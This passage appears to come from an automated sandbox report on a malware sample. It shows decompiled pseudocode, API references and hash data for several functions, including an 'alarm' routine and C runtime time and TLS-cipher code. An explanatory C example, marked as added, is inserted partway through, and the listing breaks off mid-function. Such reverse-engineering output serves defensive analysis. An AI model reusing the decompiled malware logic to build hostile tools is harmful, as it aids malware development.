                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll$@
                              • API String ID: 4061214504-2482086136
                              • Opcode ID: 6526ced06a94fd25e04ba9610b20bb07d14150e0d13d4829313775084854035e
                              • Instruction ID: 4e1649a62f6ee3b09e01f81ad3869626034710fcbdaf9da01478699b77b668ad
                              • Opcode Fuzzy Hash: 6526ced06a94fd25e04ba9610b20bb07d14150e0d13d4829313775084854035e
                              • Instruction Fuzzy Hash: A1F04430600618BBCB155F65EC09B9EBFB8EB04757F5040BAF905A2261DB799E44CA98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E004160D6(WCHAR* __ecx) {
                              				void* __edi;
                              				void* _t7;
                              				void* _t11;
                              				WCHAR* _t13;
                              				void* _t15;
                              
                              				_t16 = _t15 - 0x18;
                              				_t13 = __ecx;
                              				E00402064(_t7, _t15 - 0x18, "Alarm has been triggered!");
                              				E00402064(_t7, _t16 - 0x18, "[ALARM]");
                              				E004165D8(_t7, _t11);
                              				PlaySoundW(_t13, GetModuleHandleA(0), 0x20009);
                              				Sleep(0x2710);
                              				return PlaySoundW(0, 0, 0);
			}

                              APIs
                                • Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2
                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00416108
                              • PlaySoundW.WINMM(00000000,00000000), ref: 00416116
                              • Sleep.KERNEL32(00002710), ref: 0041611D
                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00416126
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: PlaySound$HandleLocalModuleSleepTime
                              • String ID: Alarm has been triggered!$[ALARM]
                              • API String ID: 614609389-1190268461
                              • Opcode ID: 68993d820f74bbe01997498476c5e457ff48922b1f7a2ea0347d234afb1a11a0
                              • Instruction ID: 2d10eecb587f4eb50cd82e886fdd1c0de5a54b8a21b058e5acdb0cdc04fd1f38
                              • Opcode Fuzzy Hash: 68993d820f74bbe01997498476c5e457ff48922b1f7a2ea0347d234afb1a11a0
                              • Instruction Fuzzy Hash: FFE09262A00320379524377B7D0FD2F2D28CAC2BA2B01006FFA08661D29D944900C6FB
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 69%
                              			E004350A9(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
                              				intOrPtr _v0;
                              				char _v8;
                              				signed int _v12;
                              				char _v16;
                              				signed int _v20;
                              				char _v24;
                              				void* __esi;
                              				void* __ebp;
                              				signed int _t61;
                              				void* _t64;
                              				signed int _t67;
                              				signed int _t69;
                              				signed int _t70;
                              				signed int _t73;
                              				signed int _t75;
                              				signed int _t77;
                              				signed int _t78;
                              				intOrPtr _t80;
                              				signed int _t81;
                              				void* _t82;
                              				signed int _t84;
                              				void* _t85;
                              				signed int _t87;
                              				signed int _t93;
                              				signed int _t102;
                              				void* _t104;
                              				signed int _t107;
                              				signed int* _t110;
                              				signed int* _t111;
                              				intOrPtr* _t113;
                              				signed int _t118;
                              				signed int _t120;
                              				signed int _t123;
                              				void* _t125;
                              				signed int _t128;
                              				signed int _t131;
                              				signed int _t139;
                              				signed int _t145;
                              				void _t147;
                              				void* _t148;
                              				void* _t150;
                              				void* _t152;
                              				signed int _t153;
                              				signed int _t154;
                              				void* _t155;
                              				signed int _t156;
                              				signed int _t157;
                              				signed int _t158;
                              				intOrPtr _t159;
                              
                              				_t139 = __edx;
                              				_t155 = _a4;
                              				if(_t155 == 0) {
                              					_t113 = L00439E14();
                              					_t159 = 0x16;
                              					 *_t113 = _t159;
                              					E0043626D();
                              					return _t159;
                              				}
                              				_push(__edi);
                              				_t123 = 9;
                              				memset(_t155, _t61 | 0xffffffff, _t123 << 2);
                              				_t145 = _a8;
                              				__eflags = _t145;
                              				if(_t145 == 0) {
                              					_t111 = L00439E14();
                              					_t158 = 0x16;
                              					 *_t111 = _t158;
                              					E0043626D();
                              					_t78 = _t158;
                              					L12:
                              					return _t78;
                              				}
                              				_push(__ebx);
                              				__eflags =  *(_t145 + 4);
                              				if(__eflags <= 0) {
                              					if(__eflags < 0) {
                              						L10:
                              						_t110 = L00439E14();
                              						_t157 = 0x16;
                              						 *_t110 = _t157;
                              						_t78 = _t157;
                              						L11:
                              						goto L12;
                              					}
                              					__eflags =  *_t145;
                              					if( *_t145 < 0) {
                              						goto L10;
                              					}
                              				}
                              				_t64 = 7;
                              				__eflags =  *(_t145 + 4) - _t64;
                              				if(__eflags >= 0) {
                              					if(__eflags > 0) {
                              						goto L10;
                              					}
                              					__eflags =  *_t145 - 0x93406fff;
                              					if(__eflags > 0) {
                              						goto L10;
                              					}
                              				}
                              				L00441D1C(0, _t145, _t155, __eflags);
                              				_v12 = 0;
                              				_v16 = 0;
                              				_v8 = 0;
                              				_t67 = E00441551( &_v12);
                              				_pop(_t125);
                              				__eflags = _t67;
                              				if(_t67 == 0) {
                              					_t75 = E0044157D( &_v16);
                              					_pop(_t125);
                              					__eflags = _t75;
                              					if(_t75 == 0) {
                              						_t77 = E004415A9( &_v8);
                              						_pop(_t125);
                              						__eflags = _t77;
                              						if(_t77 == 0) {
                              							_t118 =  *(_t145 + 4);
                              							_t128 =  *_t145;
                              							__eflags = _t118;
                              							if(__eflags < 0) {
                              								L28:
                              								_push(_t145);
                              								_push(_t155);
                              								_t78 = E0043B307();
                              								__eflags = _t78;
                              								if(_t78 != 0) {
                              									goto L11;
                              								}
                              								__eflags = _v12;
                              								asm("cdq");
                              								_t147 =  *_t155;
                              								_t120 = _t139;
                              								if(__eflags == 0) {
                              									L32:
                              									_t80 = _v8;
                              									L33:
                              									asm("cdq");
                              									_t148 = _t147 - _t80;
                              									asm("sbb ebx, edx");
                              									_t81 = E004504E0(_t148, _t120, 0x3c, 0);
                              									 *_t155 = _t81;
                              									__eflags = _t81;
                              									if(_t81 < 0) {
                              										_t148 = _t148 + 0xffffffc4;
                              										 *_t155 = _t81 + 0x3c;
                              										asm("adc ebx, 0xffffffff");
                              									}
                              									_t82 = E00450430(_t148, _t120, 0x3c, 0);
                              									_t121 = _t139;
                              									_t28 = _t155 + 4; // 0x848d0045
                              									asm("cdq");
                              									_t150 = _t82 +  *_t28;
                              									asm("adc ebx, edx");
                              									_t84 = E004504E0(_t150, _t139, 0x3c, 0);
                              									 *(_t155 + 4) = _t84;
                              									__eflags = _t84;
                              									if(_t84 < 0) {
                              										_t150 = _t150 + 0xffffffc4;
                              										 *(_t155 + 4) = _t84 + 0x3c;
                              										asm("adc ebx, 0xffffffff");
                              									}
                              									_t85 = E00450430(_t150, _t121, 0x3c, 0);
                              									_t122 = _t139;
                              									_t31 = _t155 + 8; // 0xa824
                              									asm("cdq");
                              									_t152 = _t85 +  *_t31;
                              									asm("adc ebx, edx");
                              									_t87 = E004504E0(_t152, _t139, 0x18, 0);
                              									 *(_t155 + 8) = _t87;
                              									__eflags = _t87;
                              									if(_t87 < 0) {
                              										_t152 = _t152 + 0xffffffe8;
                              										 *(_t155 + 8) = _t87 + 0x18;
                              										asm("adc ebx, 0xffffffff");
                              									}
                              									_t131 = E00450430(_t152, _t122, 0x18, 0);
                              									__eflags = _t139;
                              									if(__eflags < 0) {
                              										L48:
                              										_t44 = _t155 + 0x18; // 0xa024848d
                              										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;
                              										asm("cdq");
                              										_t153 = 7;
                              										_t51 = _t155 + 0xc; // 0x50506a00
                              										_t93 =  *_t51;
                              										 *(_t155 + 0x18) = ( *_t44 + 7 + _t131) % _t153;
                              										__eflags = _t93;
                              										if(_t93 > 0) {
                              											goto L43;
                              										}
                              										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;
                              										 *(_t155 + 0xc) = _t93 + 0x1f;
                              										_t55 = _t131 + 0x16d; // 0x16d
                              										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;
                              										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;
                              										goto L44;
                              									} else {
                              										if(__eflags > 0) {
                              											L42:
                              											_t34 = _t155 + 0x18; // 0xa024848d
                              											asm("cdq");
                              											_t154 = 7;
                              											_t39 = _t155 + 0xc;
                              											 *_t39 =  *(_t155 + 0xc) + _t131;
                              											__eflags =  *_t39;
                              											 *(_t155 + 0x18) = ( *_t34 + _t131) % _t154;
                              											L43:
                              											_t42 = _t155 + 0x1c;
                              											 *_t42 =  *(_t155 + 0x1c) + _t131;
                              											__eflags =  *_t42;
                              											L44:
                              											_t78 = 0;
                              											goto L11;
                              										}
                              										__eflags = _t131;
                              										if(_t131 == 0) {
                              											__eflags = _t139;
                              											if(__eflags > 0) {
                              												goto L44;
                              											}
                              											if(__eflags < 0) {
                              												goto L48;
                              											}
                              											__eflags = _t131;
                              											if(_t131 >= 0) {
                              												goto L44;
                              											}
                              											goto L48;
                              										}
                              										goto L42;
                              									}
                              								}
                              								_push(_t155);
                              								_t102 = L00441D6D(_t120, _t147, _t155, __eflags);
                              								__eflags = _t102;
                              								if(_t102 == 0) {
                              									goto L32;
                              								}
                              								_t80 = _v8 + _v16;
                              								 *((intOrPtr*)(_t155 + 0x20)) = 1;
                              								goto L33;
                              							}
                              							if(__eflags > 0) {
                              								L20:
                              								_t104 = 7;
                              								__eflags = _t118 - _t104;
                              								if(__eflags > 0) {
                              									goto L28;
                              								}
                              								if(__eflags < 0) {
                              									L23:
                              									asm("cdq");
                              									_push( &_v24);
                              									asm("sbb ebx, edx");
                              									_v24 = _t128 - _v8;
                              									_push(_t155);
                              									_v20 = _t118;
                              									_t78 = E0043B307();
                              									__eflags = _t78;
                              									if(_t78 != 0) {
                              										goto L11;
                              									}
                              									__eflags = _v12 - _t78;
                              									if(__eflags == 0) {
                              										goto L44;
                              									}
                              									_push(_t155);
                              									_t107 = L00441D6D(_t118, _t145, _t155, __eflags);
                              									__eflags = _t107;
                              									if(_t107 == 0) {
                              										goto L44;
                              									}
                              									asm("cdq");
                              									_v24 = _v24 - _v16;
                              									_push( &_v24);
                              									asm("sbb [ebp-0x10], edx");
                              									_push(_t155);
                              									_t78 = E0043B307();
                              									__eflags = _t78;
                              									if(_t78 != 0) {
                              										goto L11;
                              									}
                              									 *((intOrPtr*)(_t155 + 0x20)) = 1;
                              									goto L44;
                              								}
                              								__eflags = _t128 - 0x933c7b7f;
                              								if(_t128 >= 0x933c7b7f) {
                              									goto L28;
                              								}
                              								goto L23;
                              							}
                              							__eflags = _t128 - 0x3f480;
                              							if(_t128 <= 0x3f480) {
                              								goto L28;
                              							}
                              							goto L20;
                              						}
                              					}
                              				}
                              				_push(0);
                              				_push(0);
                              				_push(0);
                              				_push(0);
                              				_push(0);
                              				E0043629A();
                              				asm("int3");
                              				_push(_t155);
                              				_t69 = E0043B2A2(_t125);
                              				_t156 = _t69;
                              				__eflags = _t156;
                              				if(_t156 != 0) {
                              					_push(_v0);
                              					_t70 = E004350A9(0, _t139, _t145, _t156);
                              					asm("sbb eax, eax");
                              					_t73 =  !( ~_t70) & _t156;
                              					__eflags = _t73;
                              					return _t73;
                              				}
                              				return _t69;
                              			}
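The block between L32 and L44 above is a carry/borrow chain: a seconds value is divided by 0x3c twice and by 0x18 once, each negative remainder is repaired with "+ 0x3c"/"+ 0x18" and an "adc ebx, 0xffffffff" borrow, the day count is then folded into the fields at +0xc, +0x18 (mod 7) and +0x1c, and a non-positive day-of-month rolls back with the constants 0xb, 0x1f and 0x16d. The following is an added example that re-expresses that logic in plain C; it is not code from the sample or from the report. It assumes the record at _t155 is laid out like a C struct tm (0 sec, 4 min, 8 hour, 0xc mday, 0x10 mon, 0x14 year, 0x18 wday, 0x1c yday, 0x20 isdst), an inference from those constants that the report itself does not state, and it does not reproduce the 0x3f480 / 0x933c7b7f range checks that precede the block.

```c
#include <stdio.h>
#include <time.h>

/* Added example, not code from the sample. Re-expression of the carry/borrow
 * chain in the decompiled block. The struct tm layout (0 sec, 4 min, 8 hour,
 * 0xc mday, 0x10 mon, 0x14 year, 0x18 wday, 0x1c yday, 0x20 isdst) is an
 * assumption inferred from the divisors 0x3c, 0x3c, 0x18, the modulus 7 and
 * the rollback constants 0x1f, 0xb and 0x16d; the report does not name it. */

/* 64-bit signed divide the way the listing uses its divide/remainder helpers:
 * truncation toward zero yields a negative remainder for a negative dividend,
 * which the listing repairs by adding the modulus back and borrowing one from
 * the quotient ("+ 0x3c" followed by "adc ebx, 0xffffffff"). */
static long long div_borrow(long long *rem, long long n, long long d)
{
    long long q = n / d;
    *rem = n % d;
    if (*rem < 0) {
        *rem += d;
        q -= 1;
    }
    return q;
}

/* Fold a signed seconds delta into t and renormalize the time-of-day, day,
 * weekday and day-of-year fields. Behaviour copies the listing, including its
 * limits: a backward borrow that drives mday to 0 or below rolls to 31 December
 * of the previous year (mon = 11, mday += 31, yday += 365) with no leap-year
 * check, and a forward carry never rolls into the next month. */
void apply_delta(struct tm *t, long long delta_seconds)
{
    long long rem;
    long long carry = div_borrow(&rem, (long long)t->tm_sec + delta_seconds, 60);
    t->tm_sec = (int)rem;
    carry = div_borrow(&rem, (long long)t->tm_min + carry, 60);
    t->tm_min = (int)rem;
    carry = div_borrow(&rem, (long long)t->tm_hour + carry, 24);
    t->tm_hour = (int)rem;

    int days = (int)carry;
    if (days == 0)
        return;                         /* L44 in the listing: nothing else to touch */

    t->tm_mday += days;
    if (days > 0) {                     /* L42: forward carry */
        t->tm_wday = (t->tm_wday + days) % 7;
    } else {                            /* L48: backward borrow; +7 keeps % non-negative for days >= -7 */
        t->tm_wday = (t->tm_wday + 7 + days) % 7;
        if (t->tm_mday <= 0) {          /* crossed 1 January going backwards */
            t->tm_mon = 11;
            t->tm_mday += 31;
            t->tm_yday += days + 365;
            t->tm_year -= 1;
            return;
        }
    }
    t->tm_yday += days;                 /* L43 */
}

int main(void)
{
    /* Constructed input: 1 January 2021 00:00:30, a Friday (wday 5, tm_year 121). */
    struct tm t = {0};
    t.tm_sec = 30; t.tm_mday = 1; t.tm_year = 121; t.tm_wday = 5;

    apply_delta(&t, -3600);             /* one hour back, across the year boundary */
    printf("%04d-%02d-%02d %02d:%02d:%02d wday=%d yday=%d\n",
           t.tm_year + 1900, t.tm_mon + 1, t.tm_mday,
           t.tm_hour, t.tm_min, t.tm_sec, t.tm_wday, t.tm_yday);
    return 0;
}
```

The one-hour-back case is the interesting one: the seconds division produces a negative remainder, the borrow propagates through minutes and hours, the day count becomes -1, and because mday drops to 0 the record is rewritten to 31 December of the previous year, which is exactly the path through L48 in the listing.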
                              0x004350a9
                              0x004350b2
                              0x004350b7
                              0x004350b9
                              0x004350c0
                              0x004350c1
                              0x004350c3
                              0x00000000
                              0x004350c8
                              0x004350cc
                              0x004350d4
                              0x004350d5
                              0x004350d7
                              0x004350da
                              0x004350dc
                              0x004350de
                              0x004350e5
                              0x004350e6
                              0x004350e8
                              0x004350ed
                              0x0043511e
                              0x00000000
                              0x0043511e
                              0x004350f1
                              0x004350f4
                              0x004350f7
                              0x004350f9
                              0x00435111
                              0x00435111
                              0x00435118
                              0x00435119
                              0x0043511b
                              0x0043511d
                              0x00000000
                              0x0043511d
                              0x004350fb
                              0x004350fd
                              0x00000000
                              0x00000000
                              0x004350fd
                              0x00435101
                              0x00435102
                              0x00435105
                              0x00435107
                              0x00000000
                              0x00000000
                              0x00435109
                              0x0043510f
                              0x00000000
                              0x00000000
                              0x0043510f
                              0x00435124
                              0x0043512c
                              0x00435130
                              0x00435133
                              0x00435136
                              0x0043513b
                              0x0043513c
                              0x0043513e
                              0x00435148
                              0x0043514d
                              0x0043514e
                              0x00435150
                              0x0043515a
                              0x0043515f
                              0x00435160
                              0x00435162
                              0x00435168
                              0x0043516b
                              0x0043516d
                              0x0043516f
                              0x004351f0
                              0x004351f0
                              0x004351f1
                              0x004351f2
                              0x004351f9
                              0x004351fb
                              0x00000000
                              0x00000000
                              0x00435201
                              0x00435207
                              0x00435208
                              0x0043520a
                              0x0043520c
                              0x00435228
                              0x00435228
                              0x0043522b
                              0x0043522b
                              0x0043522c
                              0x00435232
                              0x00435236
                              0x0043523b
                              0x0043523d
                              0x0043523f
                              0x00435244
                              0x00435247
                              0x00435249
                              0x00435249
                              0x00435252
                              0x00435259
                              0x0043525b
                              0x0043525e
                              0x0043525f
                              0x00435265
                              0x00435269
                              0x0043526e
                              0x00435271
                              0x00435273
                              0x00435278
                              0x0043527b
                              0x0043527e
                              0x0043527e
                              0x00435287
                              0x0043528e
                              0x00435290
                              0x00435293
                              0x00435294
                              0x0043529a
                              0x0043529e
                              0x004352a3
                              0x004352a6
                              0x004352a8
                              0x004352ad
                              0x004352b0
                              0x004352b3
                              0x004352b3
                              0x004352c1
                              0x004352c3
                              0x004352c5
                              0x004352f2
                              0x004352f2
                              0x004352f8
                              0x004352ff
                              0x00435300
                              0x00435303
                              0x00435303
                              0x00435306
                              0x00435309
                              0x0043530b
                              0x00000000
                              0x00000000
                              0x00435310
                              0x00435317
                              0x0043531a
                              0x00435320
                              0x00435323
                              0x00000000
                              0x004352c7
                              0x004352c7
                              0x004352cd
                              0x004352cd
                              0x004352d4
                              0x004352d5
                              0x004352d8
                              0x004352d8
                              0x004352d8
                              0x004352db
                              0x004352de
                              0x004352de
                              0x004352de
                              0x004352de
                              0x004352e1
                              0x004352e1
                              0x00000000
                              0x004352e1
                              0x004352c9
                              0x004352cb
                              0x004352e8
                              0x004352ea
                              0x00000000
                              0x00000000
                              0x004352ec
                              0x00000000
                              0x00000000
                              0x004352ee
                              0x004352f0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004352f0
                              0x00000000
                              0x004352cb
                              0x004352c5
                              0x0043520e
                              0x0043520f
                              0x00435215
                              0x00435217
                              0x00000000
                              0x00000000
                              0x0043521c
                              0x0043521f
                              0x00000000
                              0x0043521f
                              0x00435171
                              0x0043517b
                              0x0043517d
                              0x0043517e
                              0x00435180
                              0x00000000
                              0x00000000
                              0x00435182
                              0x0043518c
                              0x0043518f
                              0x00435195
                              0x00435196
                              0x00435198
                              0x0043519b
                              0x0043519c
                              0x0043519f
                              0x004351a6
                              0x004351a8
                              0x00000000
                              0x00000000
                              0x004351ae
                              0x004351b1
                              0x00000000
                              0x00000000
                              0x004351b7
                              0x004351b8
                              0x004351be
                              0x004351c0
                              0x00000000
                              0x00000000
                              0x004351c9
                              0x004351ca
                              0x004351d0
                              0x004351d1
                              0x004351d4
                              0x004351d5
                              0x004351dc
                              0x004351de
                              0x00000000
                              0x00000000
                              0x004351e4
                              0x00000000
                              0x004351e4
                              0x00435184
                              0x0043518a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043518a
                              0x00435173
                              0x00435179
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00435179
                              0x00435162
                              0x00435150
                              0x00435328
                              0x00435329
                              0x0043532a
                              0x0043532b
                              0x0043532c
                              0x0043532d
                              0x00435332
                              0x00435338
                              0x00435339
                              0x0043533e
                              0x00435340
                              0x00435342
                              0x00435344
                              0x00435348
                              0x00435350
                              0x00435355
                              0x00435355
                              0x00000000
                              0x00435355
                              0x00435359

                              APIs
                              • __allrem.LIBCMT ref: 00435236
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435252
                              • __allrem.LIBCMT ref: 00435269
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435287
                              • __allrem.LIBCMT ref: 0043529E
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004352BC
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                              • String ID:
                              • API String ID: 1992179935-0
                              • Opcode ID: cf421956008c0296b8590752cd63f23a946e04caaf8df9a8b491fe77ede8eb7a
                              • Instruction ID: 0f9574e79e851dcb61412f9348aa4e336ac1525895054df9afc56f3bdc95fefa
                              • Opcode Fuzzy Hash: cf421956008c0296b8590752cd63f23a946e04caaf8df9a8b491fe77ede8eb7a
                              • Instruction Fuzzy Hash: B6813E72A00F059BEB20AE69CC42B6B73E8DF49768F14552FF511D7382E778D9408B98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E00440972(void* __ebx, void* __ecx, void* __edx) {
                              				void* __edi;
                              				void* __esi;
                              				intOrPtr _t2;
                              				void* _t3;
                              				void* _t4;
                              				intOrPtr _t9;
                              				void* _t11;
                              				void* _t20;
                              				void* _t21;
                              				void* _t23;
                              				void* _t25;
                              				void* _t27;
                              				void* _t29;
                              				void* _t31;
                              				void* _t32;
                              				long _t36;
                              				long _t37;
                              				void* _t40;
                              
                              				_t29 = __edx;
                              				_t23 = __ecx;
                              				_t20 = __ebx;
                              				_t36 = GetLastError();
                              				_t2 =  *0x46a1e0; // 0x6
                              				_t42 = _t2 - 0xffffffff;
                              				if(_t2 == 0xffffffff) {
                              					L2:
                              					_t3 = L0043DFD9(_t23, 1, 0x364);
                              					_t31 = _t3;
                              					_pop(_t25);
                              					if(_t31 != 0) {
                              						_t4 = L00440F8E(_t25, _t36, __eflags,  *0x46a1e0, _t31);
                              						__eflags = _t4;
                              						if(_t4 != 0) {
                              							E004407E4(_t25, _t31, 0x46b654);
                              							L0043EE85(0);
                              							_t40 = _t40 + 0xc;
                              							__eflags = _t31;
                              							if(_t31 == 0) {
                              								goto L9;
                              							} else {
                              								goto L8;
                              							}
                              						} else {
                              							_push(_t31);
                              							goto L4;
                              						}
                              					} else {
                              						_push(_t3);
                              						L4:
                              						L0043EE85();
                              						_pop(_t25);
                              						L9:
                              						SetLastError(_t36);
                              						E0043E5DA(_t20, _t29, _t31, _t36);
                              						asm("int3");
                              						_push(_t20);
                              						_push(_t36);
                              						_push(_t31);
                              						_t37 = GetLastError();
                              						_t21 = 0;
                              						_t9 =  *0x46a1e0; // 0x6
                              						_t45 = _t9 - 0xffffffff;
                              						if(_t9 == 0xffffffff) {
                              							L12:
                              							_t32 = L0043DFD9(_t25, 1, 0x364);
                              							_pop(_t27);
                              							if(_t32 != 0) {
                              								_t11 = L00440F8E(_t27, _t37, __eflags,  *0x46a1e0, _t32);
                              								__eflags = _t11;
                              								if(_t11 != 0) {
                              									E004407E4(_t27, _t32, 0x46b654);
                              									L0043EE85(_t21);
                              									__eflags = _t32;
                              									if(_t32 != 0) {
                              										goto L19;
                              									} else {
                              										goto L18;
                              									}
                              								} else {
                              									_push(_t32);
                              									goto L14;
                              								}
                              							} else {
                              								_push(_t21);
                              								L14:
                              								L0043EE85();
                              								L18:
                              								SetLastError(_t37);
                              							}
                              						} else {
                              							_t32 = L00440F38(_t25, _t37, _t45, _t9);
                              							if(_t32 != 0) {
                              								L19:
                              								SetLastError(_t37);
                              								_t21 = _t32;
                              							} else {
                              								goto L12;
                              							}
                              						}
                              						return _t21;
                              					}
                              				} else {
                              					_t31 = L00440F38(_t23, _t36, _t42, _t2);
                              					if(_t31 != 0) {
                              						L8:
                              						SetLastError(_t36);
                              						return _t31;
                              					} else {
                              						goto L2;
                              					}
                              				}
                              			}
                              0x00440972
                              0x00440972
                              0x00440972
                              0x0044097c
                              0x0044097e
                              0x00440983
                              0x00440986
                              0x00440994
                              0x0044099b
                              0x004409a0
                              0x004409a3
                              0x004409a6
                              0x004409b8
                              0x004409bd
                              0x004409bf
                              0x004409ca
                              0x004409d1
                              0x004409d6
                              0x004409d9
                              0x004409db
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004409c1
                              0x004409c1
                              0x00000000
                              0x004409c1
                              0x004409a8
                              0x004409a8
                              0x004409a9
                              0x004409a9
                              0x004409ae
                              0x004409e9
                              0x004409ea
                              0x004409f0

                              APIs
                              • GetLastError.KERNEL32(00000000,?,00434E55,?,?,?,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 00440976
                              • _free.LIBCMT ref: 004409A9
                              • _free.LIBCMT ref: 004409D1
                              • SetLastError.KERNEL32(00000000,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 004409DE
                              • SetLastError.KERNEL32(00000000,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 004409EA
                              • _abort.LIBCMT ref: 004409F0
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$_free$_abort
                              • String ID:
                              • API String ID: 3160817290-0
                              • Opcode ID: 19877d3d14e59a494c44e4fde6bb29c47705ca6ce07b5f93ecaa518254929c4a
                              • Instruction ID: a31c51b4580a199ad3038d9a62967fb3efd0f479f4e7b394ce716d3395aa3357
                              • Opcode Fuzzy Hash: 19877d3d14e59a494c44e4fde6bb29c47705ca6ce07b5f93ecaa518254929c4a
                              • Instruction Fuzzy Hash: ACF0F976141A0037F61127666C06E5F1225ABC1BAAF24012FFA14A22D3EE7CCC2245AF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 97%
                              			E0041B671(short* __edx) {
                              				signed int _v8;
                              				intOrPtr _v12;
                              				short* _v16;
                              				short _v20;
                              				char _v24;
                              				intOrPtr _v28;
                              				char _v80;
                              				void* _t45;
                              				void* _t48;
                              				void* _t59;
                              				intOrPtr _t62;
                              				void* _t64;
                              				intOrPtr _t65;
                              				void* _t67;
                              				char _t68;
                              				char _t69;
                              				char* _t70;
                              				signed int _t71;
                              				short* _t72;
                              				signed int _t76;
                              				char* _t79;
                              				char* _t81;
                              				intOrPtr _t82;
                              				char* _t85;
                              				void* _t86;
                              				void* _t89;
                              				intOrPtr _t91;
                              				char* _t92;
                              				intOrPtr* _t93;
                              				void* _t95;
                              				void* _t96;
                              				void* _t97;
                              				void* _t98;
                              
                              				_v16 = __edx;
                              				_v8 = _v8 & 0;
                              				_v20 = 0;
                              				_v12 = 0;
                              				_v24 = 0;
                              				_v28 = L0040BE3C();
                              				_t85 = "TLS_AES_128_GCM_SHA256";
                              				if(__edx == 0) {
                              					L37:
                              					return 0;
                              				}
                              				_t45 = L00438E20(_t85, "ALL", 3);
                              				_t97 = _t96 + 0xc;
                              				if(_t45 == 0) {
                              					L36:
                              					return 1;
                              				}
                              				_t48 = L00438E20(_t85, "DEFAULT", 7);
                              				_t98 = _t97 + 0xc;
                              				if(_t48 == 0) {
                              					goto L36;
                              				} else {
                              					goto L3;
                              				}
                              				do {
                              					L3:
                              					_t70 = _t85;
                              					_t86 = E004310F0(_t85, 0x4657e0);
                              					if(_t86 != 0) {
                              						_t76 = _t86 - _t70;
                              						L8:
                              						if(_t76 <= 0x31) {
                              							if(_t86 != 0) {
                              								_t89 = _t86 - _t70;
                              								L15:
                              								E0043A900( &_v80, _t70, _t89);
                              								_t98 = _t98 + 0xc;
                              								_t11 = _t89 - 1; // -1
                              								_t90 =  ==  ? _t11 : _t89;
                              								_t71 = 0;
                              								 *((char*)(_t95 + ( ==  ? _t11 : _t89) - 0x4c)) = 0;
                              								if(_v28 <= 0) {
                              									L20:
                              									_t72 = _v16;
                              									_t91 = _v12;
                              									goto L21;
                              								}
                              								_t93 = 0x4608fc;
                              								while(1) {
                              									_t15 = _t93 - 4; // 0x465d34
                              									_t59 = L00438E20( &_v80,  *_t15, 0x31);
                              									_t98 = _t98 + 0xc;
                              									if(_t59 == 0) {
                              										break;
                              									}
                              									_t67 = L00438E20( &_v80,  *_t93, 0x31);
                              									_t98 = _t98 + 0xc;
                              									if(_t67 == 0) {
                              										break;
                              									}
                              									_t71 = _t71 + 1;
                              									_t93 = _t93 + 0xc;
                              									if(_t71 < _v28) {
                              										continue;
                              									}
                              									goto L20;
                              								}
                              								_t82 = _v20;
                              								if(_t82 >= 0x12b) {
                              									goto L37;
                              								}
                              								_t76 = _t71 * 0xc;
                              								_t72 = _v16;
                              								 *((char*)(_t72 + _t82 + 4)) =  *((intOrPtr*)(_t76 + 0x460900));
                              								 *((char*)(_t72 + _t82 + 5)) =  *((intOrPtr*)(_t76 + 0x460901));
                              								_t62 =  *((intOrPtr*)(_t76 + 0x460900));
                              								_v20 = _t82 + 2;
                              								if(_t62 == 0x13) {
                              									L34:
                              									_v8 = 1;
                              									L35:
                              									_t91 = 1;
                              									_v12 = 1;
                              									goto L21;
                              								}
                              								if(_t62 != 0xc0) {
                              									L30:
                              									if(_v8 != 0) {
                              										L32:
                              										if(_v24 == 0) {
                              											_v24 = 1;
                              										}
                              										goto L35;
                              									}
                              									_t64 = E004310F0( &_v80, "ECDSA");
                              									_pop(_t76);
                              									if(_t64 != 0) {
                              										goto L34;
                              									}
                              									goto L32;
                              								}
                              								_t65 =  *((intOrPtr*)(_t76 + 0x460901));
                              								if(_t65 == 0xb4 || _t65 == 0xb5) {
                              									goto L34;
                              								} else {
                              									goto L30;
                              								}
                              							}
                              							_t92 = _t70;
                              							_t76 =  &(_t92[1]);
                              							do {
                              								_t68 =  *_t92;
                              								_t92 =  &(_t92[1]);
                              							} while (_t68 != 0);
                              							_t89 = _t92 - _t76;
                              							goto L15;
                              						}
                              						_t89 = 0x31;
                              						goto L15;
                              					}
                              					_t79 = _t70;
                              					_t81 =  &(_t79[1]);
                              					do {
                              						_t69 =  *_t79;
                              						_t79 =  &(_t79[1]);
